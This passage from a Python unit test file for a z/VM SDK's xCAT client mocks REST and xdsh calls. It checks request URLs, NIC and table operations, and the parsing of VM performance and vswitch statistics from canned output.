_get_hcp_info.return_value = {'hostname': \"fakehcp.fake.com\",\n 'nodename': \"fakehcp\",\n 'userid': \"fakeuserid\"}\n fake_vm_list = self._fake_vm_list()\n fake_vm_list.append('\"xcat\",\"fakexcat.fake.com\",,,,,')\n xrequest.return_value = {'data': [fake_vm_list, ]}\n vm_list = self._xcatclient.get_vm_list()\n self.assertIn(\"os000001\", vm_list)\n self.assertNotIn(\"xcat\", vm_list)\n self.assertNotIn(\"fakehcp\", vm_list)\n url = \"/xcatws/tables/zvm?userName=\" +\\\n CONF.xcat.username + \"&password=\" +\\\n CONF.xcat.password + \"&format=json\"\n xrequest.assert_called_once_with(\"GET\", url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_mac(self, xrequest):\n xrequest.return_value = {\"data\": [\"fakereturn\"]}\n url = \"/xcatws/tables/mac?userName=\" +\\\n CONF.xcat.username + \"&password=\" +\\\n CONF.xcat.password + \"&format=json\"\n commands = \"-d node=fakenode mac\"\n body = [commands]\n\n info = self._xcatclient._delete_mac(\"fakenode\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n self.assertEqual(info[0], \"fakereturn\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_mac_fail(self, xrequest):\n xrequest.side_effect = exception.ZVMNetworkError(msg='msg')\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient._delete_mac, 'fakenode')\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_switch(self, xrequest):\n xrequest.return_value = {\"data\": [\"fakereturn\"]}\n url = \"/xcatws/tables/switch?userName=\" +\\\n CONF.xcat.username + \"&password=\" +\\\n CONF.xcat.password + \"&format=json\"\n commands = \"-d node=fakenode switch\"\n body = [commands]\n\n info = self._xcatclient._delete_switch(\"fakenode\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n self.assertEqual(info[0], \"fakereturn\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_switch_fail(self, xrequest):\n xrequest.side_effect = exception.ZVMNetworkError(msg='msg')\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient._delete_switch, 'fakenode')\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_host(self, xrequest):\n xrequest.return_value = {\"data\": [\"fakereturn\"]}\n url = \"/xcatws/tables/hosts?userName=\" +\\\n CONF.xcat.username + \"&password=\" +\\\n CONF.xcat.password + \"&format=json\"\n commands = \"-d node=fakenode hosts\"\n body = [commands]\n\n info = self._xcatclient._delete_host(\"fakenode\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n self.assertEqual(info[0], \"fakereturn\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_host_fail(self, xrequest):\n xrequest.side_effect = exception.ZVMNetworkError(msg='msg')\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient._delete_host, 'fakenode')\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch('zvmsdk.xcatclient.XCATClient.xdsh')\n def test_image_performance_query_single(self, dsh, _get_hcp_info):\n _get_hcp_info.return_value = {'hostname': \"fakehcp.fake.com\",\n 'nodename': \"fakehcp\",\n 'userid': \"fakeuserid\"}\n dsh.return_value = {\n 'info': [], 'node': [], 'errorcode': [[u'0']],\n 'data': [['zhcp2: Number of virtual server IDs: 1 \\n'\n 'zhcp2: Virtual server ID: fakevm\\n'\n 'zhcp2: Record version: \"1\"\\n'\n 'zhcp2: Guest flags: \"0\"\\n'\n 'zhcp2: Used CPU time: \"26238001893 uS\"\\n'\n 'zhcp2: Elapsed time: \"89185770400 uS\"\\n'\n 'zhcp2: Minimum memory: \"0 KB\"\\n'\n 'zhcp2: Max memory: \"8388608 KB\"\\n'\n 'zhcp2: Shared memory: \"5222192 KB\"\\n'\n 'zhcp2: Used memory: \"5222184 KB\"\\n'\n 'zhcp2: Active CPUs in CEC: \"44\"\\n'\n 'zhcp2: Logical CPUs in VM: \"6\"\\n'\n 'zhcp2: Guest CPUs: \"2\"\\nz'\n 'hcp2: Minimum CPU count: \"2\"\\n'\n 'zhcp2: Max CPU limit: \"10000\"\\n'\n 'zhcp2: Processor share: \"100\"\\n'\n 'zhcp2: Samples CPU in use: \"16659\"\\n'\n 'zhcp2: ,Samples CPU delay: \"638\"\\n'\n 'zhcp2: Samples page wait: \"0\"\\n'\n 'zhcp2: Samples idle: \"71550\"\\n'\n 'zhcp2: Samples other: \"337\"\\n'\n 'zhcp2: Samples total: \"89184\"\\n'\n 'zhcp2: Guest name: \"FAKEVM \"', None]], 'error': []}\n pi_info = self._xcatclient.image_performance_query('fakevm')\n self.assertEqual(pi_info['FAKEVM']['used_memory'], \"5222184 KB\")\n self.assertEqual(pi_info['FAKEVM']['used_cpu_time'], \"26238001893 uS\")\n self.assertEqual(pi_info['FAKEVM']['elapsed_cpu_time'],\n \"89185770400 uS\")\n self.assertEqual(pi_info['FAKEVM']['min_cpu_count'], \"2\")\n self.assertEqual(pi_info['FAKEVM']['max_cpu_limit'], \"10000\")\n self.assertEqual(pi_info['FAKEVM']['samples_cpu_in_use'], \"16659\")\n self.assertEqual(pi_info['FAKEVM']['samples_cpu_delay'], \"638\")\n self.assertEqual(pi_info['FAKEVM']['guest_cpus'], \"2\")\n self.assertEqual(pi_info['FAKEVM']['userid'], \"FAKEVM\")\n self.assertEqual(pi_info['FAKEVM']['max_memory'], \"8388608 KB\")\n self.assertEqual(pi_info['FAKEVM']['min_memory'], \"0 KB\")\n self.assertEqual(pi_info['FAKEVM']['shared_memory'], \"5222192 KB\")\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch('zvmsdk.xcatclient.XCATClient.xdsh')\n def test_image_performance_query_multiple(self, dsh, _get_hcp_info):\n _get_hcp_info.return_value = {'hostname': \"fakehcp.fake.com\",\n 'nodename': \"fakehcp\",\n 'userid': \"fakeuserid\"}\n dsh.return_value = {\n 'info': [], 'node': [], 'errorcode': [[u'0']],\n 'data': [['zhcp2: Number of virtual server IDs: 2 \\n'\n 'zhcp2: Virtual server ID: fakevm\\n'\n 'zhcp2: Record version: \"1\"\\n'\n 'zhcp2: Guest flags: \"0\"\\n'\n 'zhcp2: Used CPU time: \"26238001893 uS\"\\n'\n 'zhcp2: Elapsed time: \"89185770400 uS\"\\n'\n 'zhcp2: Minimum memory: \"0 KB\"\\n'\n 'zhcp2: Max memory: \"8388608 KB\"\\n'\n 'zhcp2: Shared memory: \"5222192 KB\"\\n'\n 'zhcp2: Used memory: \"5222184 KB\"\\n'\n 'zhcp2: Active CPUs in CEC: \"44\"\\n'\n 'zhcp2: Logical CPUs in VM: \"6\"\\n'\n 'zhcp2: Guest CPUs: \"2\"\\nz'\n 'hcp2: Minimum CPU count: \"2\"\\n'\n 'zhcp2: Max CPU limit: \"10000\"\\n'\n 'zhcp2: Processor share: \"100\"\\n'\n 'zhcp2: Samples CPU in use: \"16659\"\\n'\n 'zhcp2: ,Samples CPU delay: \"638\"\\n'\n 'zhcp2: Samples page wait: \"0\"\\n'\n 'zhcp2: Samples idle: \"71550\"\\n'\n 'zhcp2: Samples other: \"337\"\\n'\n 'zhcp2: Samples total: \"89184\"\\n'\n 'zhcp2: Guest name: \"FAKEVM \"\\n'\n 'zhcp2: \\n'\n 'zhcp2: Virtual server ID: fakevm2\\n'\n 'zhcp2: Record version: \"1\"\\n'\n 'zhcp2: Guest flags: \"0\"\\n'\n 'zhcp2: Used CPU time: \"26238001893 uS\"\\n'\n 'zhcp2: Elapsed time: \"89185770400 uS\"\\n'\n 'zhcp2: Minimum memory: \"0 KB\"\\n'\n 'zhcp2: Max memory: \"8388608 KB\"\\n'\n 'zhcp2: Shared memory: \"5222190 KB\"\\n'\n 'zhcp2: Used memory: \"5222184 KB\"\\n'\n 'zhcp2: Active CPUs in CEC: \"44\"\\n'\n 'zhcp2: Logical CPUs in VM: \"6\"\\n'\n 'zhcp2: Guest CPUs: \"1\"\\nz'\n 'hcp2: Minimum CPU count: \"1\"\\n'\n 'zhcp2: Max CPU limit: \"10000\"\\n'\n 'zhcp2: Processor share: \"100\"\\n'\n 'zhcp2: Samples CPU in use: \"16659\"\\n'\n 'zhcp2: ,Samples CPU delay: \"638\"\\n'\n 'zhcp2: Samples page wait: \"0\"\\n'\n 'zhcp2: Samples idle: \"71550\"\\n'\n 'zhcp2: Samples other: \"337\"\\n'\n 'zhcp2: Samples total: \"89184\"\\n'\n 'zhcp2: Guest name: \"FAKEVM2 \"\\n', None]], 'error': []}\n pi_info = self._xcatclient.image_performance_query(['fakevm',\n 'fakevm2'])\n self.assertEqual(pi_info['FAKEVM']['used_memory'], \"5222184 KB\")\n self.assertEqual(pi_info['FAKEVM']['used_cpu_time'], \"26238001893 uS\")\n self.assertEqual(pi_info['FAKEVM']['elapsed_cpu_time'],\n \"89185770400 uS\")\n self.assertEqual(pi_info['FAKEVM']['min_cpu_count'], \"2\")\n self.assertEqual(pi_info['FAKEVM']['max_cpu_limit'], \"10000\")\n self.assertEqual(pi_info['FAKEVM']['samples_cpu_in_use'], \"16659\")\n self.assertEqual(pi_info['FAKEVM']['samples_cpu_delay'], \"638\")\n self.assertEqual(pi_info['FAKEVM']['guest_cpus'], \"2\")\n self.assertEqual(pi_info['FAKEVM']['userid'], \"FAKEVM\")\n self.assertEqual(pi_info['FAKEVM']['max_memory'], \"8388608 KB\")\n self.assertEqual(pi_info['FAKEVM']['min_memory'], \"0 KB\")\n self.assertEqual(pi_info['FAKEVM']['shared_memory'], \"5222192 KB\")\n self.assertEqual(pi_info['FAKEVM2']['used_memory'], \"5222184 KB\")\n self.assertEqual(pi_info['FAKEVM2']['used_cpu_time'], \"26238001893 uS\")\n self.assertEqual(pi_info['FAKEVM2']['elapsed_cpu_time'],\n \"89185770400 uS\")\n self.assertEqual(pi_info['FAKEVM2']['min_cpu_count'], \"1\")\n self.assertEqual(pi_info['FAKEVM2']['max_cpu_limit'], \"10000\")\n self.assertEqual(pi_info['FAKEVM2']['samples_cpu_in_use'], \"16659\")\n self.assertEqual(pi_info['FAKEVM2']['samples_cpu_delay'], \"638\")\n self.assertEqual(pi_info['FAKEVM2']['guest_cpus'], \"1\")\n self.assertEqual(pi_info['FAKEVM2']['userid'], \"FAKEVM2\")\n self.assertEqual(pi_info['FAKEVM2']['max_memory'], \"8388608 KB\")\n self.assertEqual(pi_info['FAKEVM2']['min_memory'], \"0 KB\")\n self.assertEqual(pi_info['FAKEVM2']['shared_memory'], \"5222190 KB\")\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch('zvmsdk.xcatclient.XCATClient.xdsh')\n def test_image_performance_query_err1(self, dsh, _get_hcp_info):\n _get_hcp_info.return_value = {'hostname': \"fakehcp.fake.com\",\n 'nodename': \"fakehcp\",\n 'userid': \"fakeuserid\"}\n dsh.return_value = {}\n self.assertRaises(exception.ZVMInvalidResponseDataError,\n self._xcatclient.image_performance_query, 'fakevm')\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch('zvmsdk.xcatclient.XCATClient.xdsh')\n def test_image_performance_query_err2(self, dsh, _get_hcp_info):\n _get_hcp_info.return_value = {'hostname': \"fakehcp.fake.com\",\n 'nodename': \"fakehcp\",\n 'userid': \"fakeuserid\"}\n dsh.return_value = {'data': [[]]}\n self.assertRaises(exception.ZVMInvalidResponseDataError,\n self._xcatclient.image_performance_query, 'fakevm')\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch('zvmsdk.xcatclient.XCATClient.xdsh')\n def test_image_performance_query_err3(self, dsh, _get_hcp_info):\n _get_hcp_info.return_value = {'hostname': \"fakehcp.fake.com\",\n 'nodename': \"fakehcp\",\n 'userid': \"fakeuserid\"}\n dsh.return_value = {\n 'info': [], 'node': [], 'errorcode': [[u'0']],\n 'data': [['zhcp2: Number of virtual server IDs: 1 ', None]],\n 'error': []}\n pi_info = self._xcatclient.image_performance_query('fakevm')\n self.assertEqual(pi_info, {})\n\n @mock.patch('zvmsdk.xcatclient.XCATClient._get_hcp_info')\n @mock.patch('zvmsdk.xcatclient.XCATClient.xdsh')\n def test_virtual_network_vswitch_query_iuo_stats(self, xdsh, get_hcp_info):\n get_hcp_info.return_value = {'hostname': 'fakehcp.ibm.com',\n 'nodename': 'fakehcp',\n 'userid': 'FAKEHCP'}\n vsw_data = ['zhcp11: vswitch count: 2\\n'\n 'zhcp11: \\n'\n 'zhcp11: vswitch number: 1\\n'\n 'zhcp11: vswitch name: XCATVSW1\\n'\n 'zhcp11: uplink count: 1\\n'\n 'zhcp11: uplink_conn: 6240\\n'\n 'zhcp11: uplink_fr_rx: 3658251\\n'\n 'zhcp11: uplink_fr_rx_dsc: 0\\n'\n 'zhcp11: uplink_fr_rx_err: 0\\n'\n 'zhcp11: uplink_fr_tx: 4209828\\n'\n 'zhcp11: uplink_fr_tx_dsc: 0\\n'\n 'zhcp11: uplink_fr_tx_err: 0\\n'\n 'zhcp11: uplink_rx: 498914052\\n'\n 'zhcp11: uplink_tx: 2615220898\\n'\n 'zhcp11: bridge_fr_rx: 0\\n'\n 'zhcp11: bridge_fr_rx_dsc: 0\\n'\n 'zhcp11: bridge_fr_rx_err: 0\\n'\n 'zhcp11: bridge_fr_tx: 0\\n'\n 'zhcp11: bridge_fr_tx_dsc: 0\\n'\n 'zhcp11: bridge_fr_tx_err: 0\\n'\n 'zhcp11: bridge_rx: 0\\n'\n 'zhcp11: bridge_tx: 0\\n'\n 'zhcp11: nic count: 2\\n'\n 'zhcp11: nic_id: INST1 0600\\n'\n 'zhcp11: nic_fr_rx: 573952\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 548780\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 4\\n'\n 'zhcp11: nic_rx: 103024058\\n'\n 'zhcp11: nic_tx: 102030890\\n'\n 'zhcp11: nic_id: INST2 0600\\n'\n 'zhcp11: nic_fr_rx: 17493\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 16886\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 4\\n'\n 'zhcp11: nic_rx: 3111714\\n'\n 'zhcp11: nic_tx: 3172646\\n'\n 'zhcp11: vlan count: 0\\n'\n 'zhcp11: \\n'\n 'zhcp11: vswitch number: 2\\n'\n 'zhcp11: vswitch name: XCATVSW2\\n'\n 'zhcp11: uplink count: 1\\n'\n 'zhcp11: uplink_conn: 6200\\n'\n 'zhcp11: uplink_fr_rx: 1608681\\n'\n 'zhcp11: uplink_fr_rx_dsc: 0\\n'\n 'zhcp11: uplink_fr_rx_err: 0\\n'\n 'zhcp11: uplink_fr_tx: 2120075\\n'\n 'zhcp11: uplink_fr_tx_dsc: 0\\n'\n 'zhcp11: uplink_fr_tx_err: 0\\n'\n 'zhcp11: uplink_rx: 314326223',\n 'zhcp11: uplink_tx: 1503721533\\n'\n 'zhcp11: bridge_fr_rx: 0\\n'\n 'zhcp11: bridge_fr_rx_dsc: 0\\n'\n 'zhcp11: bridge_fr_rx_err: 0\\n'\n 'zhcp11: bridge_fr_tx: 0\\n'\n 'zhcp11: bridge_fr_tx_dsc: 0\\n'\n 'zhcp11: bridge_fr_tx_err: 0\\n'\n 'zhcp11: bridge_rx: 0\\n'\n 'zhcp11: bridge_tx: 0\\n'\n 'zhcp11: nic count: 2\\n'\n 'zhcp11: nic_id: INST1 1000\\n'\n 'zhcp11: nic_fr_rx: 34958\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 16211\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 0\\n'\n 'zhcp11: nic_rx: 4684435\\n'\n 'zhcp11: nic_tx: 3316601\\n'\n 'zhcp11: nic_id: INST2 1000\\n'\n 'zhcp11: nic_fr_rx: 27211\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 12344\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 0\\n'\n 'zhcp11: nic_rx: 3577163\\n'\n 'zhcp11: nic_tx: 2515045\\n'\n 'zhcp11: vlan count: 0',\n None]\n xdsh.return_value = {'data': [vsw_data]}\n vsw_dict = self._xcatclient.virtual_network_vswitch_query_iuo_stats()\n self.assertEqual(2, len(vsw_dict['vswitches']))\n self.assertEqual(2, len(vsw_dict['vswitches'][1]['nics']))\n self.assertEqual('INST1',\n vsw_dict['vswitches'][0]['nics'][0]['userid'])\n self.assertEqual('3577163',\n vsw_dict['vswitches'][1]['nics'][1]['nic_rx'])\n\n @mock.patch('zvmsdk.xcatclient.XCATClient._get_hcp_info')\n @mock.patch('zvmsdk.xcatclient.XCATClient.xdsh')\n def test_virtual_network_vswitch_query_iuo_stats_special(self, xdsh,\n get_hcp_info):\n get_hcp_info.return_value = {'hostname': 'fakehcp.ibm.com',\n 'nodename': 'fakehcp',\n 'userid': 'FAKEHCP'}\n vsw_data = ['zhcp11: vswitch count: 2\\n'\n 'zhcp11: \\n'\n 'zhcp11: vswitch number: 1\\n'\n 'zhcp11: vswitch name: XCATVSW1\\n'\n 'zhcp11: uplink count: 1\\n'\n 'zhcp11: uplink_conn: 6240\\n'\n 'zhcp11: uplink_fr_rx: 3658251\\n'\n 'zhcp11: uplink_fr_rx_dsc: 0\\n'\n 'zhcp11: uplink_fr_rx_err: 0\\n'\n 'zhcp11: uplink_fr_tx: 4209828\\n'\n 'zhcp11: uplink_fr_tx_dsc: 0\\n'\n 'zhcp11: uplink_fr_tx_err: 0\\n'\n 'zhcp11: uplink_rx: 498914052\\n'\n 'zhcp11: uplink_tx: 2615220898\\n'\n 'zhcp11: bridge_fr_rx: 0\\n'\n 'zhcp11: bridge_fr_rx_dsc: 0\\n'\n 'zhcp11: bridge_fr_rx_err: 0\\n'\n 'zhcp11: bridge_fr_tx: 0\\n'\n 'zhcp11: bridge_fr_tx_dsc: 0\\n'\n 'zhcp11: bridge_fr_tx_err: 0\\n'\n 'zhcp11: bridge_rx: 0\\n'\n 'zhcp11: bridge_tx: 0\\n'\n 'zhcp11: nic count: 2\\n'\n 'zhcp11: nic_id: INST1 0600\\n'\n 'zhcp11: nic_fr_rx: 573952\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 548780\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 4\\n'\n 'zhcp11: nic_rx: 103024058\\n'\n 'zhcp11: nic_tx: 102030890\\n'\n 'zhcp11: nic_id: INST2 0600\\n'\n 'zhcp11: nic_fr_rx: 17493\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 16886\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 4\\n'\n 'zhcp11: nic_rx: 3111714\\n'\n 'zhcp11: nic_tx: 3172646\\n'\n 'zhcp11: vlan count: 0',\n 'zhcp11: vswitch number: 2\\n'\n 'zhcp11: vswitch name: XCATVSW2\\n'\n 'zhcp11: uplink count: 1\\n'\n 'zhcp11: uplink_conn: 6200\\n'\n 'zhcp11: uplink_fr_rx: 1608681\\n'\n 'zhcp11: uplink_fr_rx_dsc: 0\\n'\n 'zhcp11: uplink_fr_rx_err: 0\\n'\n 'zhcp11: uplink_fr_tx: 2120075\\n'\n 'zhcp11: uplink_fr_tx_dsc: 0\\n'\n 'zhcp11: uplink_fr_tx_err: 0\\n'\n 'zhcp11: uplink_rx: 314326223',\n 'zhcp11: uplink_tx: 1503721533\\n'\n 'zhcp11: bridge_fr_rx: 0\\n'\n 'zhcp11: bridge_fr_rx_dsc: 0\\n'\n 'zhcp11: bridge_fr_rx_err: 0\\n'\n 'zhcp11: bridge_fr_tx: 0\\n'\n 'zhcp11: bridge_fr_tx_dsc: 0\\n'\n 'zhcp11: bridge_fr_tx_err: 0\\n'\n 'zhcp11: bridge_rx: 0\\n'\n 'zhcp11: bridge_tx: 0\\n'\n 'zhcp11: nic count: 2\\n'\n 'zhcp11: nic_id: INST1 1000\\n'\n 'zhcp11: nic_fr_rx: 34958\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 16211\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 0\\n'\n 'zhcp11: nic_rx: 4684435\\n'\n 'zhcp11: nic_tx: 3316601\\n'\n 'zhcp11: nic_id: INST2 1000\\n'\n 'zhcp11: nic_fr_rx: 27211\\n'\n 'zhcp11: nic_fr_rx_dsc: 0\\n'\n 'zhcp11: nic_fr_rx_err: 0\\n'\n 'zhcp11: nic_fr_tx: 12344\\n'\n 'zhcp11: nic_fr_tx_dsc: 0\\n'\n 'zhcp11: nic_fr_tx_err: 0\\n'\n 'zhcp11: nic_rx: 3577163\\n'\n 'zhcp11: nic_tx: 2515045\\n'\n 'zhcp11: vlan count: 0',\n None]\n xdsh.return_value = {'data': [vsw_data]}\n vsw_dict = self._xcatclient.virtual_network_vswitch_query_iuo_stats()\n self.assertEqual(2, len(vsw_dict['vswitches']))\n self.assertEqual(2, len(vsw_dict['vswitches'][1]['nics']))\n self.assertEqual('INST1',\n vsw_dict['vswitches'][0]['nics'][0]['userid'])\n self.assertEqual('3577163',\n vsw_dict['vswitches'][1]['nics'][1]['nic_rx'])\n\n @mock.patch('zvmsdk.xcatclient.XCATClient._get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, 'xdsh')\n def test_virtual_network_vswitch_query_iuo_stats_invalid_data(self, xdsh,\n get_hcp_info):\n get_hcp_info.return_value = {'hostname': 'fakehcp.ibm.com',\n 'nodename': 'fakehcp',\n 'userid': 'FAKEHCP'}\n xdsh.return_value = ['invalid', 'data']\n self.assertRaises(exception.ZVMInvalidResponseDataError,\n self._xcatclient.virtual_network_vswitch_query_iuo_stats)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, '_add_switch_table_record')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_private_create_nic_active(self, xrequest, _add_switch, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'cmabvt'}\n xrequest.return_value = {\"errorcode\": [['0']]}\n self._xcatclient._create_nic(\"fakenode\", \"fake_vdev\", \"fakehcp\",\n nic_id=\"fake_nic\",\n mac_addr='11:22:33:44:55:66',\n active=True)\n _add_switch.assert_called_once_with(\"fakenode\", \"fake_vdev\",\n nic_id=\"fake_nic\",\n zhcp=\"fakehcp\")\n\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = ' '.join(('/opt/zhcp/bin/smcli',\n 'Virtual_Network_Adapter_Create_Extended_DM',\n \"-T fakenode\",\n \"-k image_device_number=fake_vdev\",\n \"-k adapter_type=QDIO\",\n \"-k mac_id=445566\"))\n xdsh_commands = 'command=%s' % commands\n body1 = [xdsh_commands]\n\n commands = ' '.join(('/opt/zhcp/bin/smcli',\n 'Virtual_Network_Adapter_Create_Extended',\n \"-T fakenode\",\n \"-k image_device_number=fake_vdev\",\n \"-k adapter_type=QDIO\"))\n xdsh_commands = 'command=%s' % commands\n body2 = [xdsh_commands]\n xrequest.assert_any_call(\"PUT\", url, body1)\n xrequest.assert_any_call(\"PUT\", url, body2)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_add_switch_table_record(self, xrequest):\n xrequest.return_value = {\"data\": [\"fakereturn\"]}\n url = \"/xcatws/tables/switch?userName=\" +\\\n CONF.xcat.username + \"&password=\" +\\\n CONF.xcat.password + \"&format=json\"\n commands = \"switch.node=fakenode\" + \" switch.interface=fake\"\n commands += \" switch.port=fake-port\"\n commands += \" switch.comments=fakezhcp\"\n body = [commands]\n\n info = self._xcatclient._add_switch_table_record(\"fakenode\", \"fake\",\n \"fake-port\",\n \"fakezhcp\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n self.assertEqual(info[0], \"fakereturn\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_add_switch_table_record_fail(self, xrequest):\n xrequest.side_effect = exception.ZVMNetworkError(msg='msg')\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient._add_switch_table_record,\n \"fakenode\", \"fake\", \"fake-port\",\n \"fakezhcp\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_update_vm_info(self, xrequest):\n node = 'fakenode'\n node_info = ['sles12', 's390x', 'netboot',\n '0a0c576a_157f_42c8_2a254d8b77f']\n url = \"/xcatws/nodes/fakenode?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n self._xcatclient._update_vm_info(node, node_info)\n xrequest.assert_called_with('PUT', url,\n ['noderes.netboot=zvm',\n 'nodetype.os=sles12',\n 'nodetype.arch=s390x',\n 'nodetype.provmethod=netboot',\n 'nodetype.profile=0a0c576a_157f_42c8_2a254d8b77f'])\n\n @mock.patch.object(xcatclient, 'xcat_request')\n @mock.patch.object(xcatclient.XCATClient, '_update_vm_info')\n def test_guest_deploy(self, _update_vm_info, xrequest):\n node = \"testnode\"\n image_name = \"sles12-s390x-netboot-0a0c576a_157f_42c8_2a254d8b77fc\"\n transportfiles = '/tmp/transport.tgz'\n\n url = \"/xcatws/nodes/testnode/bootstate?userName=\" +\\\n CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n self._xcatclient.guest_deploy(node, image_name, transportfiles)\n _update_vm_info.assert_called_with('testnode',\n ['sles12', 's390x', 'netboot', '0a0c576a_157f_42c8_2a254d8b77fc'])\n\n xrequest.assert_called_with('PUT', url,\n ['netboot', 'device=0100',\n 'osimage=sles12-s390x-netboot-0a0c576a_157f_42c8_2a254d8b77fc',\n 'transport=/tmp/transport.tgz'])\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_private_power_state(self, xreq):\n expt = {'info': [[u'fakeid: on\\n']]}\n expt_url = ('/xcatws/nodes/fakeid/power?userName=%(uid)s&password='\n '%(pwd)s&format=json' % {'uid': CONF.xcat.username,\n 'pwd': CONF.xcat.password})\n xreq.return_value = expt\n resp = self._xcatclient._power_state('fakeid', 'GET', 'state')\n xreq.assert_called_once_with('GET', expt_url, ['state'])\n self.assertEqual(resp, expt)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_private_power_state_invalid_node(self, xreq):\n xreq.side_effect = exception.ZVMClientRequestFailed(\n msg='error: Invalid nodes and/or groups: fakenode')\n self.assertRaises(exception.ZVMVirtualMachineNotExist,\n self._xcatclient._power_state, 'fakeid', 'GET', ['state'])\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_lsdef(self, xrequest):\n fake_userid = 'fake_userid'\n fake_url = self._xcat_url.lsdef_node('/' + fake_userid)\n self._xcatclient._lsdef(fake_userid)\n xrequest.assert_called_once_with('GET', fake_url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_lsvm(self, xrequest):\n fake_userid = 'fake_userid'\n fake_resp = {'info': [[fake_userid]],\n 'node': [],\n 'errocode': [],\n 'data': []}\n xrequest.return_value = fake_resp\n ret = self._xcatclient._lsvm(fake_userid)\n self.assertEqual(ret[0], fake_userid)\n\n def test_get_guest_connection_status(self):\n # TODO:moving to vmops and change name to ''\n pass\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_create_xcat_node(self, xrequest, ghi):\n fake_userid = 'userid'\n fake_url = self._xcat_url.mkdef('/' + fake_userid)\n fake_body = ['userid=%s' % fake_userid,\n 'hcp=%s' % 'fakehcp',\n 'mgt=zvm',\n 'groups=%s' % const.ZVM_XCAT_GROUP]\n ghi.return_value = {'hostname': 'fakehcp'}\n\n self._xcatclient.create_xcat_node(fake_userid)\n xrequest.assert_called_once_with(\"POST\", fake_url, fake_body)\n\n def test_prepare_for_spawn(self):\n pass\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_remove_image_file(self, xrequest):\n fake_image_name = 'fake_image_name'\n fake_url = self._xcat_url.rmimage('/' + fake_image_name)\n self._xcatclient.remove_image_file(fake_image_name)\n\n xrequest.assert_called_once_with('DELETE', fake_url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_remove_image_definition(self, xrequest):\n fake_image_name = 'fake_image_name'\n fake_url = self._xcat_url.rmobject('/' + fake_image_name)\n\n self._xcatclient.remove_image_definition(fake_image_name)\n xrequest.assert_called_once_with('DELETE', fake_url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_tabdum_info(self, xrequest):\n fake_url = self._xcat_url.tabdump('/zvm')\n\n self._xcatclient.get_tabdump_info()\n xrequest.assert_called_once_with('GET', fake_url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_do_capture(self, xrequest):\n fake_url = self._xcat_url.capture()\n fake_nodename = 'nodename'\n fake_profile = 'profiiiillle'\n fake_body = ['nodename=' + 